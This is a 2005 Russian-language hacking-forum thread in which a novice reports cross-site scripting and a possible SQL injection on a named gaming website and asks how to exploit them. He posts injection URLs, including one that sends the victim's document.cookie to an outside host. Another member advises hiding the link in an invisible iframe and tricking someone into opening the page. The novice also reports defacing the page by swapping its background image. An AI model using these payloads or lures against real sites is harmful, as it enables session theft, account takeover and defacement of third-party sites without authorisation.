Нашел дыру, но не знаю че делать дальше - помогите новичку :)

Discussion in 'Болталка' started by m4e, 15 Jun 2005.

  1. m4e

    m4e New Member

    Joined:
    14 Jun 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Привет всем, я нашел дыру вот тут -

    1. http://wow.crpg.ru/search.php
    если сделать так:
    http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>alert(document.cookie);</script

    то вроде все получается, однако это же нечеловечно, хотелось бы поцивелизованнее чтоли... в общем не знаю как и что еще можно оттуда извлечь...

    2. а еще там же дыра -
    http://wow.crpg.ru/printfeature.php?artid=
    если ввести после равно qwerty то выпадает в ошибку базы. Как можно провести хацк? :rolleyes:
     
  2. FoX's

    FoX's Дохлый

    Joined:
    26 Dec 2004
    Messages:
    169
    Likes Received:
    29
    Reputations:
    0
    1 Можно украсть куки.

    2 Это по ходу не дыра.. А ошибка в скрипте.
     
  3. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Угу, второй случай - просто обработка этого qwerty и иже с ними неправильна. Вот скрипт и ругается. Посмотрел бы сам вначале, чем тревогу бить.. видно же что кроме пути к файлу, здесь больше ничё не выцепишь.

    А по 1 случаю. ХЗ. помоему хрен что сделаешь)). Хотя я не смотрел, признаюсь).
     
  4. m4e

    m4e New Member

    Joined:
    14 Jun 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0

    Тык как цивилизованно украсть то? не пошлешь же ссылку вида
    http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>img = new Image(); img.src =<a href="http://antichat.ru/cgi-bin/s.jpg">+document.cookie;</script>

    Как-бы ее запрятать так, чтоб явно не торчала...
     
  5. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    А ошибка в скрипте - не дыра? ))
     
  6. FoX's

    FoX's Дохлый

    Joined:
    26 Dec 2004
    Messages:
    169
    Likes Received:
    29
    Reputations:
    0
    нет...
     
  7. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    КЕЗ не всегда.
    "))))"
     
  8. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    нет, конечно если там написано
    fopem вместо fopen то да, это вообще ничего работать небудет,
    но в данном случае это и ест дыра
     
  9. m4e

    m4e New Member

    Joined:
    14 Jun 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ближе к теме, мальчики и девочки :)
    с похожей ссылкой удалось сделать дефейс сменой картинки бекграунда, но опять же увидишь, только если полностью набить адрес+код в експлорере...
     
  10. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Сначала выясни - что хранится в куках. Если там есть пасс (хэш пасса), то просто создаешь страницу с нулевым (невидимым фреймом) где ссылка на этот фрейм будет та которую ты нашел. И после всего этого пишешь или по личке или еще кому-нить - так мол и так. Гляньте на страницу (чтобы глянули - прояви фантазию).

    p.s. только сначала проверь чтобы все фурычило, иногда неполучится куку перхватить
     
    _________________________
  11. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    а во второй ссылке разве нету Скуль Инж-а?
     
  12. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    есть там инъекция
     
  13. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    я и про это =)) а то сказали что нету во второй ничего это просто ошибка...там же написано что ошибка в мускуле...значит есть вероятность инжекшена
     
  14. m4e

    m4e New Member

    Joined:
    14 Jun 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Тык примерчик напишите, хуч... ато уже от видеохаков глаза болят :)

    Я понимаю что нужно выполнить запрос, но не могу воткнуть как
     
    #14 m4e, 15 Jun 2005
    Last edited: 15 Jun 2005
  15. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    я не силен в мускл но обычный запроса типа 999'СЕЛЕКТ админ ФРОМ юзерз не сработал )))
     
  16. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
  17. m4e

    m4e New Member

    Joined:
    14 Jun 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    ыы... а дальше что? Чувствую себя тупым как буратино : (
     
  18. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
  19. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    странно...)
     
  20. FoBE

    FoBE Guest

    Reputations:
    0
    Да, очень странно :)